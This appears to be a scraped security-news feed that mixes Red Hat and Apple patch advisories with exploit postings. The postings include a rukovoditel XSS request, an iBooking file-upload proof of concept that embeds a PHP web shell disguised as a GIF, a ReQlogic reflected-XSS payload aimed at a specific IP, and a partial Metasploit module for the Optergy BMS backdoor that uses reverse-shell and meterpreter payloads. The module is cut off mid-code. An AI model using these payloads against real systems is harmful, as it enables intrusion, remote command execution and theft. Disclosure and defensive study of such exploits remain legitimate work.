Red Hat Security Advisory 2023-1486-01 - Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB. Django is a high-level Python Web framework that encourages rapid development and a clean, pragmatic design. It focuses on automating as much as possible and adhering to the DRY principle. Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks. Issues addressed include HTTP request smuggling, code execution, and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat Gluster Storage web-admin-build security update  
Advisory ID:       RHSA-2023:1486-01  
Product:           Red Hat Gluster Storage  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1486  
Issue date:        2023-03-28  
CVE Names:         CVE-2022-24790 CVE-2022-30122 CVE-2022-30123   
                   CVE-2022-31129 CVE-2022-31163   
=====================================================================

1. Summary:

An update is now available for Red Hat Gluster Storage 3.5 for RHEL 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Gluster 3.5 Web Administration on RHEL-7 - noarch, x86_64

3. Description:

Grafana is an open source, feature rich metrics dashboard and graph editor  
for Graphite, InfluxDB & OpenTSDB.

Django is a high-level Python Web framework that encourages rapid  
development and a clean, pragmatic design. It focuses on automating as much  
as possible and adhering to the DRY (Don't Repeat Yourself) principle.

Ruby is an extensible, interpreted, object-oriented, scripting language. It  
has features to process text files and to perform system management tasks.

Security Fix(es):

* puma-5.6.4: http request smuggling vulnerabilities (CVE-2022-24790)

* rubygem-rack: crafted requests can cause shell escape sequences  
(CVE-2022-30123)

* moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)

* rubygem-tzinfo: arbitrary code execution (CVE-2022-31163)

* rubygem-rack: crafted multipart POST request may cause a DoS  
(CVE-2022-30122)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2071616 - CVE-2022-24790 puma-5.6.4: http request smuggling vulnerabilities  
2099519 - CVE-2022-30122 rubygem-rack: crafted multipart POST request may cause a DoS  
2099524 - CVE-2022-30123 rubygem-rack: crafted requests can cause shell escape sequences  
2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS  
2110551 - CVE-2022-31163 rubygem-tzinfo: arbitrary code execution

6. Package List:

Red Hat Gluster 3.5 Web Administration on RHEL-7:

Source:  
grafana-5.2.4-6.el7rhgs.src.rpm  
python-django-1.11.27-4.el7rhgs.src.rpm  
ruby-2.4.9-94.el7rhgs.src.rpm  
rubygem-activemodel-5.2.0-1.el7rhgs.src.rpm  
rubygem-activesupport-5.2.0-1.el7rhgs.src.rpm  
rubygem-bcrypt-3.1.12-2.el7rhgs.src.rpm  
rubygem-concurrent-ruby-1.1.9-1.el7rhgs.src.rpm  
rubygem-i18n-1.9.1-1.el7rhgs.src.rpm  
rubygem-mustermann-1.0.3-1.el7rhgs.src.rpm  
rubygem-nio4r-2.3.1-2.el7rhgs.src.rpm  
rubygem-puma-4.3.12-1.el7rhgs.src.rpm  
rubygem-rack-2.2.4-1.el7rhgs.src.rpm  
rubygem-rack-protection-2.2.0-1.el7rhgs.src.rpm  
rubygem-sinatra-2.2.0-1.el7rhgs.src.rpm  
rubygem-thread_safe-0.3.6-1.el7rhgs.src.rpm  
rubygem-tilt-2.0.11-1.el7rhgs.src.rpm  
rubygem-tzinfo-1.2.10-1.el7rhgs.src.rpm

noarch:  
python-django-bash-completion-1.11.27-4.el7rhgs.noarch.rpm  
python2-django-1.11.27-4.el7rhgs.noarch.rpm  
python2-django-doc-1.11.27-4.el7rhgs.noarch.rpm  
ruby-doc-2.4.9-94.el7rhgs.noarch.rpm  
ruby-irb-2.4.9-94.el7rhgs.noarch.rpm  
rubygem-activemodel-5.2.0-1.el7rhgs.noarch.rpm  
rubygem-activemodel-doc-5.2.0-1.el7rhgs.noarch.rpm  
rubygem-activesupport-5.2.0-1.el7rhgs.noarch.rpm  
rubygem-activesupport-doc-5.2.0-1.el7rhgs.noarch.rpm  
rubygem-bcrypt-doc-3.1.12-2.el7rhgs.noarch.rpm  
rubygem-concurrent-ruby-1.1.9-1.el7rhgs.noarch.rpm  
rubygem-concurrent-ruby-doc-1.1.9-1.el7rhgs.noarch.rpm  
rubygem-i18n-1.9.1-1.el7rhgs.noarch.rpm  
rubygem-i18n-doc-1.9.1-1.el7rhgs.noarch.rpm  
rubygem-minitest-5.10.1-94.el7rhgs.noarch.rpm  
rubygem-mustermann-1.0.3-1.el7rhgs.noarch.rpm  
rubygem-mustermann-doc-1.0.3-1.el7rhgs.noarch.rpm  
rubygem-nio4r-doc-2.3.1-2.el7rhgs.noarch.rpm  
rubygem-power_assert-0.4.1-94.el7rhgs.noarch.rpm  
rubygem-puma-doc-4.3.12-1.el7rhgs.noarch.rpm  
rubygem-rack-2.2.4-1.el7rhgs.noarch.rpm  
rubygem-rack-doc-2.2.4-1.el7rhgs.noarch.rpm  
rubygem-rack-protection-2.2.0-1.el7rhgs.noarch.rpm  
rubygem-rack-protection-doc-2.2.0-1.el7rhgs.noarch.rpm  
rubygem-rake-12.0.0-94.el7rhgs.noarch.rpm  
rubygem-rdoc-5.0.1-94.el7rhgs.noarch.rpm  
rubygem-sinatra-2.2.0-1.el7rhgs.noarch.rpm  
rubygem-sinatra-doc-2.2.0-1.el7rhgs.noarch.rpm  
rubygem-test-unit-3.2.3-94.el7rhgs.noarch.rpm  
rubygem-thread_safe-0.3.6-1.el7rhgs.noarch.rpm  
rubygem-thread_safe-doc-0.3.6-1.el7rhgs.noarch.rpm  
rubygem-tilt-2.0.11-1.el7rhgs.noarch.rpm  
rubygem-tilt-doc-2.0.11-1.el7rhgs.noarch.rpm  
rubygem-tzinfo-1.2.10-1.el7rhgs.noarch.rpm  
rubygem-tzinfo-doc-1.2.10-1.el7rhgs.noarch.rpm  
rubygem-xmlrpc-0.2.1-94.el7rhgs.noarch.rpm  
rubygems-2.6.14.4-94.el7rhgs.noarch.rpm  
rubygems-devel-2.6.14.4-94.el7rhgs.noarch.rpm

x86_64:  
grafana-5.2.4-6.el7rhgs.x86_64.rpm  
ruby-2.4.9-94.el7rhgs.x86_64.rpm  
ruby-debuginfo-2.4.9-94.el7rhgs.x86_64.rpm  
ruby-devel-2.4.9-94.el7rhgs.x86_64.rpm  
ruby-libs-2.4.9-94.el7rhgs.x86_64.rpm  
rubygem-bcrypt-3.1.12-2.el7rhgs.x86_64.rpm  
rubygem-bcrypt-debuginfo-3.1.12-2.el7rhgs.x86_64.rpm  
rubygem-bigdecimal-1.3.2-94.el7rhgs.x86_64.rpm  
rubygem-did_you_mean-1.1.0-94.el7rhgs.x86_64.rpm  
rubygem-io-console-0.4.6-94.el7rhgs.x86_64.rpm  
rubygem-json-2.0.4-94.el7rhgs.x86_64.rpm  
rubygem-net-telnet-0.1.1-94.el7rhgs.x86_64.rpm  
rubygem-nio4r-2.3.1-2.el7rhgs.x86_64.rpm  
rubygem-nio4r-debuginfo-2.3.1-2.el7rhgs.x86_64.rpm  
rubygem-openssl-2.0.9-94.el7rhgs.x86_64.rpm  
rubygem-psych-2.2.2-94.el7rhgs.x86_64.rpm  
rubygem-puma-4.3.12-1.el7rhgs.x86_64.rpm  
rubygem-puma-debuginfo-4.3.12-1.el7rhgs.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-24790  
https://access.redhat.com/security/cve/CVE-2022-30122  
https://access.redhat.com/security/cve/CVE-2022-30123  
https://access.redhat.com/security/cve/CVE-2022-31129  
https://access.redhat.com/security/cve/CVE-2022-31163  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCJbr9zjgjWX9erEAQjn5RAAoUF/k8EPq7iO9+x35TIISMUb+zNQON1F  
iM5r74vbqDjgB7HjNBJptdMj25UA+gOqrzl2UfpWpw5QZlPpnr3nCEcHrq1qKHHt  
IT7cZUWdvp1Gz+e0OtSPHDvmSlS/Wko1ElsH4i5SZayl+K9V7DJjShd0KJGpK9F4  
grBeCjGqGr9Yl2QVAjrKLtWg4JGzbKO0WNJ+vs5XaN3SToCy534sIsRTkH2/JMcG  
B9yQPQ0uQ6p6GBzPNWwReZngACEgEVIVwyFFVuEEbli7b5d5qzRCSFycrp8qqlGd  
HGYVRXIk8pWnzq/Ex99Rv9ni3zQlwBkBWeQxko30NfTZAS5mS94n66+dJc6Ynxhr  
yQo/WHGd4OlHlBt4d3HTLfgl0O9Fwz60B/o8MWHf+FkR/byxOiPbLPuNZekCXNEP  
jVGnFw46osRgBjw2qerUuftnMLi9NY6+SoaEfRTjaQSxC+wv+9gUmgKkOSKgK3xr  
ThraNkkupLwWNA+AsIQGlGwfPHKyAbP3qr6yCulFB4fKb9btOprq7b+cxGhZt5ql  
R7NFlVZuMg6uTnb+YXAOoAsLzWQJpZiOXO8g3B3UhQcjqamgo/7Rr62n4kFDslfN  
HDWP2/GJeYe7A3DlfRawVi5zAFa5HCSDdsZUjvFa67cwv/3H2jgnFg4kSBj6yb3P  
dK9wE3y07no=  
=kXpV  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1486-01

rukovoditel version 3.2.1 suffers from a cross site scripting vulnerability.

    ## Title: rukovoditel 3.2.1 - Cross-Site Scripting (XSS)## Author: nu11secur1ty## Date: 11.03.2022## Vendor: https://www.rukovoditel.net/## Software: https://sourceforge.net/projects/rukovoditel/files/rukovoditel_3.2.1.zip/download## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1## Description:The application is vulnerable to DOM-based cross-site scriptingattacks. Data is read from `location.hash` and passed to`jQuery.parseHTML`.The attacker can use this vulnerability to create an unlimited numberof accounts on this system until it crashed.## STATUS: HIGH Vulnerability - CRITICAL[+] Payload:```POSTGET /rukovoditel/index.php?module=users/restore_password HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63Safari/537.36Connection: closeCache-Control: max-age=0Cookie: sid=jf2mf72r2kfakhhnn6evgusrcg;cookie_test=please_accept_for_session;app_login_redirect_to=module%3Ddashboard%2FUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/rukovoditel/index.php?module=users/loginSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1)## Proof and Exploit:[href](https://streamable.com/i1qmfk)## Time spent`3:45`

rukovoditel 3.2.1 Cross Site Scripting

iBooking version 1.0.8 suffers from a remote shell upload vulnerability.

    # Exploit Title: iBooking v1.0.8 - Arbitrary File Upload# Exploit Author: d1z1n370/oPty# Date: 01/11/2022# Vendor Homepage: https://codecanyon.net/item/ibooking-laravel-booking-system/30362088# Tested on: Linux# Version: 1.0.8# Exploit Description:The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.# PoC request POST https://localhost/dashboard/upload-new-media HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://localhost/dashboard/settingsX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------115904534120015298741783774062Content-Length: 449Connection: closeCookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c-----------------------------115904534120015298741783774062Content-Disposition: form-data; name="_token"kVTpp66poSLeJVYgb1sM6F7KIzQV2hbVfQLaUEEW-----------------------------115904534120015298741783774062Content-Disposition: form-data; name="is_modal"1-----------------------------115904534120015298741783774062Content-Disposition: form-data; name="file"; filename="upload.php56"Content-Type: image/gifGIF89a;<?php system($_GET['a']); phpinfo(); ?>-----------------------------115904534120015298741783774062--

iBooking 1.0.8 Remote Shell Upload

Red Hat Security Advisory 2023-1409-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.12.9.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.12.9 security update  
Advisory ID:       RHSA-2023:1409-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1409  
Issue date:        2023-03-27  
CVE Names:         CVE-2021-20329 CVE-2023-0767   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.12.9 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.12.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.12.9. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHSA-2023:1408

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

Security Fix(es):

* mongo-go-driver: specific cstrings input may not be properly validated  
(CVE-2021-20329)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.12 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.12 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

The sha values for the release are

(For x86_64 architecture)  
The image digest is  
sha256:96bf74ce789ccb22391deea98e0c5050c41b67cc17defbb38089d32226dba0b8

(For s390x architecture)  
The image digest is  
sha256:3212a1f7b5dd35e6fc1821d6479792d615fe7fb987c9c202b8bba6e310cb8234

(For ppc64le architecture)  
The image digest is  
sha256:82afa12a5c172ef53df9a9bb366c64210fdf164b03b1caf56e0f33ef3f2ad4d4

(For aarch64 architecture)  
The image digest is  
sha256:049dda19feec94ab7767e5426a46c24e40e15f8f6a3471f325bfcdd7977f90bb

All OpenShift Container Platform 4.12 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

1971033 - CVE-2021-20329 mongo-go-driver: specific cstrings input may not be properly validated

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-10241 - Backport request for 4.12 version - BZ#2116562  
OCPBUGS-10289 - Broken link for Ansible tagging  
OCPBUGS-10318 - node healthz server is missing in ovnk  
OCPBUGS-10372 - Newly provisioned machines unable to join cluster  
OCPBUGS-10490 - 4.12 cleanup: Move checkForStaleOVSInterfaces and related code to node.go  
OCPBUGS-10496 - [release-4.12] Uploading large layers fails with "blob upload invalid"  
OCPBUGS-10497 - aws: mismatch between RHCOS and AWS SDK regions  
OCPBUGS-10505 - 4.1 born cluster fails to scale-up due to podman run missing `--authfile` flag  
OCPBUGS-10514 - Risk cache warming takes too long on channel changes  
OCPBUGS-10587 - Console shows x509 error when requesting token from oauth endpoint  
OCPBUGS-2439 - "Failed to open directory, disabling udev device properties" in node-exporter logs  
OCPBUGS-6036 - Project dropdown order is not as smart as project list page order  
OCPBUGS-676 - cluster-machine-approver doesn't ignore case for CSR hostnames  
OCPBUGS-7445 - MTU migration configuration is cleaned up prematurely while in progress  
OCPBUGS-7469 - GCP XPN should only be available with Tech Preview  
OCPBUGS-7481 - [gcp][CORS-1988] "create manifests" without an existing "install-config.yaml" missing 4 YAML files in "<install dir>/openshift" which leads to "create cluster" failure  
OCPBUGS-7650 - Redhat-operators are failing regularly due to startup probe timing out which in turn increases CPU/Mem usage on Master nodes  
OCPBUGS-7800 - Project Access tab cannot differentiate between users and groups  
OCPBUGS-8014 - add default noProxy config for Azure  
OCPBUGS-8015 - Azure: VIP 168.63.129.16 should be noProxy to all clouds except Public  
OCPBUGS-8339 - Bug with Red Hat Integration - 3scale - Managed Application Services causes operator-install-single-namespace.spec.ts to fail  
OCPBUGS-9927 - Enable node healthz server for ovnk in CNO 

6. References:

https://access.redhat.com/security/cve/CVE-2021-20329  
https://access.redhat.com/security/cve/CVE-2023-0767  
https://access.redhat.com/security/updates/classification/#moderate  
https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCIHbtzjgjWX9erEAQhUUA/9Gb/UzKNSXb8mz2MJed59dfhKaf1y1D+u  
lEkjj+um/vh4GitNMPPhCuilemY1N23xIvsAiljfTwjVuv7J6cAID33d74kkNb1x  
qVvzxEresaSEXsZnjGmM2xwFh9vom5F0Cqs010IyyXSgMuVm2Z253oZVRTTG8YXn  
iroRGCEYHyDQ571z1+7PeZ6EXBEK2WrKymB3k7h8VgMh6dDIDpKwL7TSOlrhTcRO  
zVGHk6MNCfHmRdIExp0kP//wWIO5mA5Jm+cmnhQWq8RbRx0WZngXJSs2rEdKDS92  
57GRjEKszXajxGIw4KDz6GnSjJ4ETCEeRR3LSqcYa5Ba3spxn1cBwECgqbMDyPMj  
Gi6CtnrHw55GgF+XTltZNEEZfPQkuX8YcUm54Oafz+0Aoqw+OShQgdayl/DiIWaa  
XS/HqbOAL+icwopP+JryTdaKKC6X1FwVzMBLsunSrV9eVxn2BeyB6K6EP4pTGGZD  
NXs4CDi1oDSrjo+sjm1y3tB8TTedmqs243jJUvCeS49XJmSPZJ0givjou9elBO6t  
LSxiJCOTl4eBQrEBrBxESJ2zZ0KCV5kDP6LPAnr//yhP3Hq6eSF9zGup6DWmVOsR  
unGUbNl06+8Rm9hsRn8m04S/7EN+Tkwmc6Vbk2ph1amwjzIswLS5oLO3U2XbXuUq  
Ca2Pw33m97k=  
=w+n4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1409-01

Apple Security Advisory 2023-03-27-8 - Safari 16.4 addresses bypass vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-03-27-8 Safari 16.4

Safari 16.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213671.

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may bypass Same  
Origin Policy  
Description: This issue was addressed with improved state management.  
WebKit Bugzilla: 248615  
CVE-2023-27932: an anonymous researcher

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: A website may be able to track sensitive user information  
Description: The issue was addressed by removing origin information.  
WebKit Bugzilla: 250837  
CVE-2023-27954: an anonymous researcher

Additional recognition

CFNetwork  
We would like to acknowledge an anonymous researcher for their  
assistance.

WebKit  
We would like to acknowledge an anonymous researcher for their  
assistance.

WebKit Web Inspector  
We would like to acknowledge Dohyun Lee (@l33d0hyun) and crixer  
(@pwning_me) of SSD Labs for their assistance.

Safari 16.4 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmQiHn4ACgkQ4RjMIDke  
NxnzuA//R6r9YrqrgdWro+Why6ihvWKdVIBgEVu93nNfgd34+HLkRKsr00xH0hNw  
kDvjtfPpCeuQB61VtVO6dCEPHLJICqEyOeqHoIDYvKwAoH830u3S4vWA6ozJpBmd  
CCI+5tF9qAZWb+O0ED+hyU31z/+0s+gTGUjp7dhAnKJ6jKQOjSwWG4+YEgJA6wGG  
oOC8dXGTWMHQJsDyxliGC/FQVo6cyWtbZiwWB9QYKP48yIldrRWJz75xOUWYOjWe  
GYZ+vNDaOIi+/YHRHRYf/RY7Fdigur5rsWtzK/0v1T/n3t2kwe6WZkF4HdKFHRXL  
KSw1fogSQh1BncUXlVfkn3BMPoEOUxHkhtawdKkewK+W8ZTC2mq+YwrJ26YZMTmU  
5Nvgua4gxm2gb8LupcaXxt+o/nIbbTWyNx6rEyskWMxw6jZksBwgdDk2pSrUtmWh  
d2VnkbUjoLXbP7uqSrf2gqd6drAVrHUlmEHLVAXCG60mhWNzCxr2M+DG2RZ0RLgJ  
DMy2O4zxdzWZxkRJE86LchYz8zToQD7eQXm3zMQTGdSZoJXr3NxVGwdCaCGdhGAA  
ckJV7nHybrVGQXdo5EeNuxKeiyJMimGGIDpQmHrrf+PgeL7zKi9e4KwyyobAmvZn  
lw86QALA/97AKbSQthqHlDnv+inUrdwH1TWcurtCkjeRHgkhif8=  
=o24C  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-03-27-8

ReQlogic version 11.3 suffers from a cross site scripting vulnerability.

**ReQlogic 11.3 Cross Site Scripting**

Posted Mar 28, 2023

Authored by Okan Kurtulus

ReQlogic version 11.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

advisories | CVE-2022-41441

SHA-256 | 5227ba88f59a5d4cccd1b7cd664927cd29c2794c9b0bb18836fe0f6ab3662551

Download | Favorite | View

**ReQlogic 11.3 Cross Site Scripting**

    # Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)# Date: 9 October 2022# Exploit Author: Okan Kurtulus# Vendor Homepage: https://reqlogic.com# Version: 11.3# Tested on: Linux# CVE : 2022-41441# Proof of Concept:1- Install ReQlogic v11.32- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=33- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters.#XSS Payload:</script><script>alert(1)</script>#Affected PrametersPOBatchWaitDuration#Final URLshttp://20.36.214.225:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3http://20.36.214.225:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>

**File Tags**

*   ActiveX (932)
*   Advisory (80,599)
*   Arbitrary (15,917)
*   BBS (2,859)
*   Bypass (1,653)
*   CGI (1,022)
*   Code Execution (7,047)
*   Conference (677)
*   Cracker (840)
*   CSRF (3,306)
*   DoS (22,932)
*   Encryption (2,359)
*   Exploit (50,720)
*   File Inclusion (4,180)
*   File Upload (951)
*   Firewall (821)
*   Info Disclosure (2,689)
*   Intrusion Detection (876)
*   Java (2,957)
*   JavaScript (830)
*   Kernel (6,449)
*   Local (14,297)
*   Magazine (586)
*   Overflow (12,543)
*   Perl (1,419)
*   PHP (5,111)
*   Proof of Concept (2,297)
*   Protocol (3,502)
*   Python (1,488)
*   Remote (30,282)
*   Root (3,534)
*   Rootkit (502)
*   Ruby (603)
*   Scanner (1,633)
*   Security Tool (7,824)
*   Shell (3,133)
*   Shellcode (1,206)
*   Sniffer (890)
*   Spoof (2,182)
*   SQL Injection (16,171)
*   TCP (2,384)
*   Trojan (687)
*   UDP (880)
*   Virus (663)
*   Vulnerability (31,381)
*   Web (9,467)
*   Whitepaper (3,740)
*   x86 (946)
*   XSS (17,581)
*   Other

**File Archives**

*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,960)
*   BSD (370)
*   CentOS (56)
*   Cisco (1,919)
*   Debian (6,714)
*   Fedora (1,691)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (340)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,130)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (12,923)
*   Slackware (941)
*   Solaris (1,609)
*   SUSE (1,444)
*   Ubuntu (8,448)
*   UNIX (9,208)
*   UnixWare (185)
*   Windows (6,532)
*   Other

ReQlogic 11.3 Cross Site Scripting

This Metasploit module exploits an undocumented backdoor vulnerability in the Optergy Proton and Enterprise Building Management System (BMS) applications. Versions 2.0.3a and below are vulnerable. Attackers can exploit this issue by directly navigating to an undocumented backdoor script called Console.jsp in the tools directory and gain full system access. Successful exploitation results in root command execution using sudo as user optergy.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Optergy Proton and Enterprise BMS Command Injection using a backdoor',        'Description' => %q{          This module exploits an undocumented backdoor vulnerability in the Optergy Proton and Enterprise          Building Management System (BMS) applications. Versions `2.0.3a` and below are vulnerable.          Attackers can exploit this issue by directly navigating to an undocumented backdoor script          called Console.jsp in the tools directory and gain full system access.          Successful exploitation results in `root` command execution using `sudo` as user `optergy`.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF Module contributor          'Gjoko Krstic <gjoko[at]applied-risk.com>' # Discovery        ],        'References' => [          [ 'CVE', '2019-7276'],          [ 'URL', 'https://applied-risk.com/resources/ar-2019-008' ],          [ 'URL', 'https://optergy.com/products/proton/' ],          [ 'URL', 'https://optergy.com/products/optergy-enterprise/' ],          [ 'URL', 'https://attackerkb.com/topics/QrYFIjnd3J/cve-2019-7276' ],          [ 'EDB', '47641'],          [ 'PACKETSTORM', '155258']        ],        'DisclosureDate' => '2019-11-05',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'Payload' => { 'BadChars' => "\x20" },              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64, ARCH_X86],              'Type' => :linux_dropper,              'CmdStagerFlavor' => [ 'wget', 'printf', 'echo' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 80,          'SSL' => false        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptBool.new('SUDO', [ true, 'Set the sudo option to get root privileges', false ])      ]    )  end  def execute_command(cmd, _opts = {})    # Step 1: get the challenge and compute the response answer for the backdoor execution    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/tools/ajax/ConsoleResult.html?get')    })    if res.nil? || (res.code != 200)      return nil    else      # Get and create a challenge response      res_json = res.get_json_document      return nil if res_json.nil? || res_json.blank?      # Get the challenge      challenge = res_json['response']['message']      # Make SHA1 hash from received challenge      h1 = Digest::SHA1.hexdigest challenge      # Make MD5 hash from SHA1 hash      h2 = Digest::MD5.hexdigest h1      # Combine MD5 hash and SHA1 hash as answer (response) to the challenge      answer = h1 + h2    end    # Step 2: execute payload (RCE) using the backdoor and challenge response obtained from step 1.    if target['Type'] == :linux_dropper      cmd = cmd.gsub(' ') { '${IFS}' }    end    if datastore['SUDO']      payload = "sudo bash -c #{cmd}"    else      payload = "bash -c #{cmd}"    end    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 